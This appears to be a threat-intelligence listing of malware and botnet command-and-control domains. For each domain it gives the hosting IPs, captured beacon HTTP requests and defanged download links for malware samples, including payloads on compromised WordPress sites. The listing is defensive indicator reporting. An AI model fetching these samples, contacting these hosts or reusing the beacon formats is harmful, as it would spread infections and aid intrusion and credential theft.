http

pltd.myjino.ru(HTTP Malware Hosted In Russian Federation Moscow Avguro Technologies Ltd. Hosting Service Provider)

Domain Name : pltd.myjino.ru 81.177.140.144 HTTP Requests : http://pltd.myjino.ru/finsess.php Data : POST /finsess.php HTTP/1.0 Host: pltd.myjino.ru Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Content-Type: application/x-www-form-urlencoded Content-Length: 26 1=1882869218&2=&3=&99=15&^ Get sample here : hxxp://93.95.99.172/0310_crypted.exe Hosting infos : http://whois.domaintools.com/81.177.140.144

righromonhen.ru(HTTP Trojan Password Stealer Hosted In Russian Federation Miragroup Ltd.)

righromonhen.ru 93.171.202.172 www.peak-exposure.co.uk 174.136.12.119 www.depalmaelocatelli.it 62.149.140.139 HTTP Requests hxxp://www.peak-exposure.co.uk/wp-content/plugins/cached_data/k1.exe hxxp://righromonhen.ru/gate.php hxxp://www.depalmaelocatelli.it/wp-content/plugins/cached_data/k1.exe Hosting Infos : http://whois.domaintools.com/93.171.202.172

damcodes777.cc(HTTP Malware Hosted In Russian Federation Moscow Fast Serv Inc.)

damcodes777.cc 86.105.227.124 URL hxxp://damcodes777.cc/b/connect/2 DATA : POST /b/connect/2 HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0(compatible; MSIE 7.0b; Windows NT 6.0) Host: damcodes777.cc Content-Length: 51 Cache-Control: no-cache cs=aW5zZXJ0&p=Windows+XP+32+HOME&m=3107216218&v=3.0 Hosting Infos : http://whois.domaintools.com/86.105.227.124

ptmr1.in(HTTP Botnet Hosted In France Roubaix Ovh Sas)

DNS  Requests   Request                 Result ptmr1.in              94.23.104.199 HTTP Command  GET /~clientes/i/i.php?frevny=fQ90R444P&bf=KC-FC8&qryn l=855555&irefvba=f6557&hcqngvzr=5 Hosting infos: http://whois.domaintools.com/94.23.104.199